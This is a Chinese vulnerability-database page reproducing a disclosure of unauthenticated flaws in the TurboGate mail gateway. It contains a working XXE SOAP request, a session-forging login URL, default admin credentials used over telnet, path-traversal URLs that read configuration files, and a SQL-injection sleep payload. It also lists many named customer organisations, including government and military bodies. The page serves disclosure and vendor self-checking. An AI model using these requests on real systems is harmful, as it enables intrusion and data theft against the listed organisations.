|TurboGate邮件网关漏洞合集 - VULHUB开源网络安全威胁库

TurboGate邮件网关漏洞合集

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：拓波软件旗下另一款产品，用户量还是挺大的。 ### 详细说明： TurboGate其实相当于TurboMail的早期版本，TurboGate集成了大量的在TurboMail中出现的漏洞。这里只列出无需登录即可利用的漏洞，厂商可以根据TurboMail漏洞进行自查。 1. http://**.**.**.**/bugs/wooyun-2016-0167905 在TurboGate中使用的是axis2<=1.5.1版本，存在XXE漏洞，在利用的时候需要将Content-Type设置为application/xml，POST包如下： ``` POST /services/TM_User.TM_UserHttpSoap11Endpoint/ HTTP/1.0 SOAPAction: "urn:getUserOrgList" Content-Type: application/xml Content-Length: 873 Host: **.**.**.** <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "aaaaa">%remote;]> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:soap="http://**.**.**.**/wsdl/soap/" xmlns:xsd="http://**.**.**.**/1999/XMLSchema" xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance" xmlns:m0="http://**.**.**.**/" xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="http://user.webservice.turbomail"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:getUserOrgList> <urn:apiName>${alpharand}</urn:apiName> <urn:apiPassword>g00dPa$$w0rD</urn:apiPassword> <urn:userName>${alpharand}</urn:userName> <urn:domain>1</urn:domain> <urn:resultType>1</urn:resultType> </urn:getUserOrgList> </SOAP-ENV:Body> </SOAP-ENV:Envelope> ``` [<img src="https://images.seebug.org/upload/201603/0523222565dd9c72c99a1927b03646d441c6f5d2.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/0523222565dd9c72c99a1927b03646d441c6f5d2.png) 列目录： [<img src="https://images.seebug.org/upload/201603/05232630169922d9a6cdb390a850894f488c8f9a.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/05232630169922d9a6cdb390a850894f488c8f9a.png) 读文件： [<img src="https://images.seebug.org/upload/201603/05232939598c46440834efb455463c2c81d02622.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/05232939598c46440834efb455463c2c81d02622.png) 2. http://**.**.**.**/bugs/wooyun-2010-0174305 获取用于登录的MD5sid： ``` http://**.**.**.**/mailmain?type=getmd5sid1&username=postmaster&domain=root ``` 利用XXE读取log文件： [<img src="https://images.seebug.org/upload/201603/06001446ac445d003f4b37479cc338adfbaf8b05.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/06001446ac445d003f4b37479cc338adfbaf8b05.png) 利用md5sid登录： ``` http://**.**.**.**/mailmain?type=login&uid=postmaster&domain=root&md5sid=9946d95d95ab011fbb1836378335e2f9 ``` [<img src="https://images.seebug.org/upload/201603/06001648883ae145c874e98c5b7d28ad08aa9f6c.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/06001648883ae145c874e98c5b7d28ad08aa9f6c.png) 3. http://**.**.**.**/bugs/wooyun-2010-0176317 首先是TurboStore的默认账户密码admin/admin321 使用telnet进行登录： ``` telnet **.**.**.** 9668 login admin admin321 quit ``` [<img src="https://images.seebug.org/upload/201603/05234004354fa46a7efa9d85f1ab6d81c58c5b20.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/05234004354fa46a7efa9d85f1ab6d81c58c5b20.png) 在原文中提到需要用到从Request中获取msgid的值来组成文件名，当文件存在时则可以获取Sessionid，在新版的TurboMail中对msgid参数使用Util.dirSafe(mbtype)进行了检查，但是在TurboGate中未做此检查，因此可以构造msgid从而生成sessionid，代码如下： ``` /* 649 */ String strMsgid = request.getParameter("msgid"); /* 650 */ if (strMsgid == null) { /* 651 */ strMsgid = "0"; /* */ } /* 653 */ strMsgid = Util.formatRequest(strMsgid, MailMain.s_os, /* 654 */ SysConts.New_InCharSet); /* 728 */ strMailFolderPath = /* 729 */ UserAccount.getSuitUserPath(spamUserName, /* 729 */ spamDomain) + /* 730 */ SysConts.FILE_SEPARATOR + /* 731 */ "spambox" + /* 732 */ SysConts.FILE_SEPARATOR + /* 733 */ strMsgid; /* */ /* 735 */ File flMsg = new File(strMailFolderPath); /* */ /* 737 */ if ((!flMsg.exists()) && (!TBoxFile.isTboxFile(strMailFolderPath))) { /* 738 */ if (bAjax) /* 739 */ AjaxUtil.ajaxFail(request, response, "info.isemailexist", null); /* */ else /* 741 */ XInfo.gotoInfo(ms, request, response, "info.isemailexist", /* 742 */ null, 0); /* 743 */ ms.logoutAndRemove(); /* 744 */ return; /* */ } ``` 直接访问一下地址： ``` **.**.**.**:8080/mailmain?type=showmsgabstract&receiveaccount=@@spambox&useraccount=@@spambox&mbid=0&mbtype=spam&msgid=../../../../conf/server.xml&lang=SIMPLIFIED_CHINESE ``` 右键查看源码，在其中获得sessionid： [<img src="https://images.seebug.org/upload/201603/05235303bf01f31cf4e396a6227de5ef08cef9a3.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/05235303bf01f31cf4e396a6227de5ef08cef9a3.png) 然后通过获取到的sessionid进行SQL注射： ``` **.**.**.**:8080/mailmain?type=sumsendfailmsgstat&intertype=ajax&sessionid=3283b0Hd_0.g&sender=-1%27union%20all%20select%20sleep%285%29%23&startDate=20160216&endDate=20160216 ``` 列几个受影响的站点： ``` **.**.**.**:8080/mailmain?type=inputpwd&mbid=0&msgid=../../../../conf/server.xml&lang=SIMPLIFIED_CHINESE&mbtype=spam&useraccount=@@spambox&receiveaccount=@@spambox **.**.**.**:8080/mailmain?type=inputpwd&mbid=0&msgid=../../../../conf/server.xml&lang=SIMPLIFIED_CHINESE&mbtype=spam&useraccount=@@spambox&receiveaccount=@@spambox **.**.**.**:8080/mailmain?type=inputpwd&mbid=0&msgid=../../../../conf/server.xml&lang=SIMPLIFIED_CHINESE&mbtype=spam&useraccount=@@spambox&receiveaccount=@@spambox http://**.**.**.**:8080/mailmain?type=inputpwd&mbid=0&msgid=../../../../conf/server.xml&lang=SIMPLIFIED_CHINESE&mbtype=spam&useraccount=@@spambox&receiveaccount=@@spambox http://**.**.**.**/mailmain?type=inputpwd&mbid=0&msgid=../../../../conf/dbconf.xml&lang=SIMPLIFIED_CHINESE&mbtype=spam&useraccount=@@spambox&receiveaccount=@@spambox **.**.**.**:8080/mailmain?type=inputpwd&mbid=0&msgid=../../../../conf/dbconf.xml&lang=SIMPLIFIED_CHINESE&mbtype=spam&useraccount=@@spambox&receiveaccount=@@spambox **.**.**.**/mailmain?type=inputpwd&mbid=0&msgid=../../../../conf/dbconf.xml&lang=SIMPLIFIED_CHINESE&mbtype=spam&useraccount=@@spambox&receiveaccount=@@spambox **.**.**.**:8080/mailmain?type=inputpwd&mbid=0&msgid=../../../../conf/dbconf.xml&lang=SIMPLIFIED_CHINESE&mbtype=spam&useraccount=@@spambox&receiveaccount=@@spambox ``` 官网中http://**.**.**.**/提到的客户列表： ``` ·海军装备设计研究院 ·中国气象局上海台风研究所 ·北京市海淀区老师进修学校 ·海淀区职工大学 ·东莞同济大学研究院 ·华中师范大学物理科学与技术学院粒子所 ·华中科技大学文华学院 ·浙商金汇信托股份有限公司 ·跨世投资（上海）股份有限公司 ·北京资配易投资顾问有限公司 ·天祺资本投资（北京）有限公司 ·鹏博士集团 ·金发科技股份有限公司 ·中国城市规划设计研究院 ·本溪市社会保险事业管理局 ·黑龙江省卫生监督所 ·雷山县人口和计划生育局 ·鹤壁市淇县人民政府 ·中共毕节市纪律检查委员会 ·清远市广州后花园有限公司 ·香港地铁有限公司 ·河南省工商联小微企业服务中心 ·南京中电熊猫平板显示科技有限公司 ·成都唐源电气有限责任公司 ·河南电视台 ·中山东菱威力电器有限公司 ·深圳市同创国芯电子有限公司 ·北京金川投资有限公司 ·浙江中城智慧城市规划咨询有限公司 ·埃帝科测量设备（上海）有限公司 ·广州汽车集团商贸有限公司 ·河南瑞生磁动力科技有限公司 ·广东阿格蕾雅光电材料有限公司 ·湖北东峻工贸有限公司 ·中国地方煤矿总公司 ·博川水务投资有限公司 ·沈阳化工大学 ·河南瑞生磁动力科技有限公司 ·广东阿格蕾雅光电材料有限公司 ·湖北东峻工贸有限公司 ·东方之星贸易有限公司 ·四川省川威集团有限公司 ·上海美吉生物医药科技有限公司 ·东方银行业高管研修院 ·广州蓝态环保科技有限公司 ·中国空间技术研究院 ·上海利得财富资产管理有限公司 ·衍茂焱（上海）商贸有限公司 ·常州索贝德机械零部件润滑技术有限公司 ·深圳市纽泰克电子有限公司 ·星河湾地产控股有限公司 ·华数传媒网络有限公司 ·青岛金汇方圆投资有限公司 ·山西大运汽车制造有限公司 ·威廉士制冷设备(东莞)有限公司 ·北京方大炭素科技有限公司 ·徐州巨杰机电有限公司 ·晟通科技集团有限公司 ·首钢日电电子有限公司 ·广州市键达电子科技有限公司 ·上海天云融创计算机科技有限公司 ·广州汇智通信技术有限公司 ·河南省农业综合开发公司 ·新华人寿保险股份有限公司 ·云浮市威帝科贸发展有限公司 ·西京学院 ·内蒙古电力(集团)有限责任公司 ·利得（中国）财富管理中心 ·东方银行业高管研修院 ·常州索贝德机械零部件润滑技术有限公司 ·从化市交通局 ·北龙中网（北京）科技有限责任公司 ·广州市嘉裕房地产发展有限公司 ·昆明五华区政府 ·英杰宝电子（苏州）有限公司 ·中山永发纸业有限公司 ·江门市瑞期精细化学工程有限公司 ·西北核技术研究所 ·国家无线电监测中心（中国无线电协会） ·青岛金汇方圆投资公司 ·中电投财务有限公司 ·深圳市华圣邦国际货运代理有限公司 ·北京红树科技有限公司 ·珠海市金方达科技有限公司 ·上海君塘信息技术有限公司 ·成都三零普瑞科技有限公司 ·中国某部队 ·绵阳市商业银行 ·南京威孚金宁有限公司 ·广州市纳闵电子科技有限公司 ·苏州国科综合数据中心有限公司 ·广东思哲供应链管理有限公司 ·景德镇市焦化工业集团有限责任公司 ·北京高策房地产经纪有限公司 ·北京旋极信息技术股份有限公司 ·宝鸡聚丰房地产开发（集团）有限公司天下汇国际购物中心 ·厦门佳德兴工贸有限公司 ·中国电信（澳门）有限公司 ·北京北方京糖洋酒销售有限公司 ·袁隆平农业高科技股份有限公司 ·广州蒙尔特应用复合材料有限公司 ·毕节市纪委 ·新疆和静县人民政府 ·成都安美科燃气技术有限公司 ·浙江司太立制药股份有限公司 ·深圳市康达尔（集团）股份有限公司 ·浦项（辽宁）汽车配件制造有限公司 ·内蒙古教育招生考试信息中心 ·苏州海昌集团有限公司 ·君华集团有限公司 ·南通瑞慈体检有限公司 ·深圳市润迅电话商务有限公司 ·泰信基金管理有限公司 ·中国人民解放军某工厂 ·北京鼎力兴商贸有限责任公司 ·苏州市启吴自动化科技有限公司 ·内蒙古电力(集团)有限责任公司 ·深圳飞音科技有限公司 ·深圳市怡化电脑有限公司 ·广州康健纺织服装有限公司 ·深圳市索莱瑞医疗技术有限公司 ·上海埃蒙特自动化系统有限公司 ·东方盐湖城置业有限公司 ·广州市元镁计算机科技有限公司 ·新金星贸易（福建）集团有限公司 ·富士通（中国）信息系统有限公司 ·华电四川发电有限公司宝珠寺水力发电厂 ·宁波市财政局 ·中国航空服务有限公司 ·中国人民银行沈阳支行 ·北京北辰东软信息技术有限公司 ·广西东方航洋实业集团有限公司 ·深圳市远行科技有限公司 ·瑞莱生物科技（江苏）有限公司 ·汇鸿货运代理（烟台）有限公司 ·浙江大唐乌沙山发电有限责任公司 ·国家食品药品监督管理局南方医药经济研究所 ·广东恒洁卫浴有限公司 ·四川航空股份有限公司 ·江苏爱信诺航天信息科技有限公司 ·沈阳市和平区瀚华小额贷款有限公司 ·深圳市旺鑫精密工业有限公司龙岗分公司 ·河南省商丘市邮政局 ·四川航空股份有限公司 ·广州东昇机械有限公司 ·新日石(上海)贸易有限公司 ·广州市重点公共建设项目管理办公室 ·中泰创展控股有限公司 ·新疆生产建设兵团总医院 ·北京农业信息技术研究中心 ·武汉光谷广场建设发展有限公司 ·天津市邮政公司 ·广州海洋地质调查局 ·新疆生产建设兵团总医院 ·贵州省机场集团有限公司 ·苏州斯莱克精密设备股份有限公司 ·天津市规划局 ·北京市禽蛋公司 ·深圳汉晨投资有限公司 ·深圳市爱渡飞科技有限公司 ·北京波特耐尔石油技术有限公司 ·广州秀珀化工股份有限公司 ·深圳达实智能股份有限公司 ·深圳市泓润融资担保有限公司 ·湖南省亲和力旅游国际旅行社有限公司 ·宝佳丰（北京）国际建筑景观规划设计有限公司 ·江苏康诺医疗器械有限公司 ·武汉东环车身系统有限公司 ·中国人民银行南宁市分行 ·天衡国际贸易（香港）有限公司 ·北京世基和成房地产投资管理有限公司 ·广州中医药大学 ·海明控股有限公司 ·四川省电信有限公司 ·河南省南阳市人民政府 ·扬州尚杰针织品有限公司 ·河南交通投资集团 ·洛阳市涧西区人民政府 ·河南省开封汽车运输总公司 ·乐凯华光印刷科技有限公司 ·河南高速公路发展有限责任公司 ·河南省人民政府国有资源监督管理委员会 ·中国移动通信集团河南有限公司平顶山市市区分公司 ·重庆垫江县委 ·三亚君澜度假酒店 ·广州日锻汽门有限公司 ·东莞捷通达电讯有限公司 ·北京泛太天成国际公关顾问有限公司 ·北京联东投资(集团)有限公司 ·日彩影像科技（九江）有限公司 ·东莞市龙健电子有限公司 ·武汉燎原模塑有限公司 ·武汉元丰汽车零部件有限公司 ·中国人民银行武汉分行 ·湖南顺天建设集团 ·浙江欧意电器有限公司 ·东莞廷邑制模有限公司 ·中国人民解放军某工厂 ·喀什公路管理局 ·上海日和网络科技有限公司 ·福建永福集团 ·河南新乡天光科技有限公司 ·山东三龙智能技术有限公司 ·上海钢市投资控股有限公司 ·万达杰诚国际物流（北京）有限公司 ·上海西科姆保安服务有限公司 ·五矿国际信托有限公司 ·深圳钰湖电力有限公司 ·上海逸尚信息咨询有限公司 ·东莞艺家沙发有限公司 ·江苏怡和科技股份有限公司 ·国家药监局 ·中国一拖集团有限公司 ·江苏经济信息委员会 ·辽宁本溪社保局 ·神华销售集团有限公司 ·湖北航特科技有限责任公司 ·北京地铁车辆装备有限公司 ·北京京津港国际物流有限公司 ·深圳市旺鑫精密工业有限公司 ·台州市新立模塑有限公司 ·深圳市极泰德科技有限公司 ·浙江银付通信息科技有限公司 ·深圳市旺鑫精密工业有限公司 ·上海汽车集团财务有限责任公司 ·成都工具研究所有限公司 ·东莞富盛伟五金制品有限公司 ·广州厚诚润滑油有限公司 ·坚持我的服饰（杭州）股份有限公司 ·江苏天行健国际物流有限公司 ·浙江绿洲制冷设备有限公司 ·贵州省煤矿设计研究院 ·吴江绿鎂精密科技有限公司 ·江苏省丹阳市精密合金厂有限公司 ·中国人民银行安徽省分行 ·哈电通用风能（常熟）有限公司 ·江苏白雪电器股份有限公司 ·东莞唯美陶瓷有限公司 ·中国高等教育学生信息网 ·江西景德镇电厂 ·鹤壁豫鹤同力水泥厂 ·深圳市出租屋综合管理信息中心 ·广州市高新技术创业服务中心 ·珠海市骏建皮塑实业有限公司 ·北京东晨利能科技发展有限公司 ·广州日滨科技发展有限公司 ·珠海德凌电子科技有限公司 ·四川水利职业技术学院 ·浙江日发数码精密机械股份有限公司 ·北京青云创业投资管理有限公司 ·北京青云创业投资管理有限公司 ·中国有色金属进出口江西有限公司 ·浙江苏泊尔药品销售有限公司 ·中国山东对外经济技术合作集团有限公司 ·深圳市润诚达电力科技有限公司 ·北京市城市规划设计研究院 ·深圳市国微电子股份有限公司 ·浙江大瑞漆业科技有限公司 ``` ### 漏洞证明：同上

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™